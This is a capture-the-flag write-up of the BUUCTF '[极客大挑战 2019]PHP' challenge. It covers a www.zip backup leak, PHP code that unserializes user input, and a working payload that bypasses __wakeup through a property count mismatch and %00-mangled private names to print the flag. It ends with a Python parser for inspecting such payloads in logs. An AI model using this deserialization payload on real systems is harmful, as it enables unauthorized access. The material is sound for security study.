buuctf-web-[极客大挑战 2019]PHP 1

Knowledge points: backup file leak, PHP deserialization

Opening the site, the page source gives no hint, but the page itself says "backing up is a good habit". Scanning the web root with 御剑 (the Yujian directory scanner) turns up www.zip; unpacking it reveals several PHP files.

Opening index.php, the key code is:

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);// unserialize user-controlled input from the query string
?>

Now open class.php and read the code:

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        // runs right after unserialize(), before __destruct: resets username
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }
    }
}

Reading the code, the flag is only printed when username is admin and password is 100. But __wakeup has to be bypassed, otherwise username is reset to guest before __destruct runs.

Bypass: declare a property count in the serialized object that is larger than the real number of properties.

First attempt at a payload: ?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

This errors out. The problem is that the "spaces" in the private property names are really NUL bytes and were lost; writing them as %00 gives the flag:

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
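Two details from the writeup are worth seeing concretely: why the declared count of 3 against 2 real properties matters, and why the spaced payload fails while the %00 one works. PHP serializes a private property as "\0Class\0prop" (and a protected one as "\0*\0prop"), so a key written with spaces is a different, public property name and the real private $password keeps its default. The count mismatch is the trigger that made old PHP skip __wakeup; PHP releases from 5.6.25 and 7.0.10 onward no longer skip it. The following Python is an added example, not code from the writeup or the challenge: it percent-decodes a select value as PHP would, parses the object, demangles each key, and reports the declared-versus-actual count, which is the kind of check a defender can run over request logs. It assumes ASCII-only payloads and supports only the s: and i: types the challenge uses.

```python
import re
from urllib.parse import unquote

# Constructed inputs: the two `select` values from the writeup, exactly as they
# would appear in the query string. PHP percent-decodes %00 into a real NUL byte.
SELECT_WITH_SPACES = 'O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}'
SELECT_WITH_NULS = 'O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}'

_OBJ = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')
_STR = re.compile(r's:(\d+):"')
_INT = re.compile(r'i:(-?\d+);')


def _read_scalar(data, pos):
    """Read one s: or i: value starting at pos; return (value, position after it).
    Only these two types are handled (assumption: enough for this challenge)."""
    if data.startswith('s:', pos):
        m = _STR.match(data, pos)
        if not m:
            raise ValueError(f'malformed string at offset {pos}')
        n = int(m.group(1))
        start = m.end()
        value = data[start:start + n]  # the declared length is authoritative, as in PHP
        if data[start + n:start + n + 2] != '";':
            raise ValueError(f'string at offset {pos} does not match its declared length')
        return value, start + n + 2
    if data.startswith('i:', pos):
        m = _INT.match(data, pos)
        if not m:
            raise ValueError(f'malformed integer at offset {pos}')
        return int(m.group(1)), m.end()
    raise ValueError(f'unsupported type at offset {pos}: {data[pos:pos + 2]!r}')


def parse_object(serialized):
    """Parse one top-level O:... object; return (class name, declared count, {key: value})."""
    m = _OBJ.match(serialized)
    if not m:
        raise ValueError('not a serialized object')
    name_len, cls, declared = int(m.group(1)), m.group(2), int(m.group(3))
    if name_len != len(cls):
        raise ValueError('class name length mismatch')
    pos = m.end()
    props = {}
    while pos < len(serialized) and serialized[pos] != '}':
        key, pos = _read_scalar(serialized, pos)
        value, pos = _read_scalar(serialized, pos)
        props[key] = value
    if serialized[pos:pos + 1] != '}':
        raise ValueError('unterminated object')
    return cls, declared, props


def demangle(key):
    """Map a serialized property key to (visibility, owner, plain name) using PHP's
    name mangling: "\\0Class\\0prop" is private to Class, "\\0*\\0prop" is protected,
    anything else is a public property."""
    if key.startswith('\x00'):
        _, owner, plain = key.split('\x00', 2)
        return ('protected' if owner == '*' else 'private', owner, plain)
    return ('public', None, key)


def inspect_select(raw_query_value):
    """Percent-decode a select value as PHP would, parse it, and report the
    declared-vs-actual property count plus where each key actually lands."""
    cls, declared, props = parse_object(unquote(raw_query_value))
    return {
        'class': cls,
        'declared': declared,
        'actual': len(props),
        'count_mismatch': declared != len(props),
        'properties': [demangle(k) + (v,) for k, v in props.items()],
    }


if __name__ == '__main__':
    for label, value in (('spaces', SELECT_WITH_SPACES), ('%00', SELECT_WITH_NULS)):
        report = inspect_select(value)
        print(f'[{label}] class={report["class"]} declared={report["declared"]} '
              f'actual={report["actual"]} mismatch={report["count_mismatch"]}')
        for visibility, owner, name, v in report['properties']:
            print(f'    {visibility:9} owner={owner!r:8} {name!r} = {v!r}')
```

Running it shows both payloads flagged with a 3-versus-2 count mismatch, but only the %00 version resolves its keys to the private username and password of class Name; the spaced version creates two public properties with odd names, which is exactly why the first attempt printed the "NO!!!hacker!!!" branch.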

posted @ 2022-12-31 22:57  Dk只能爬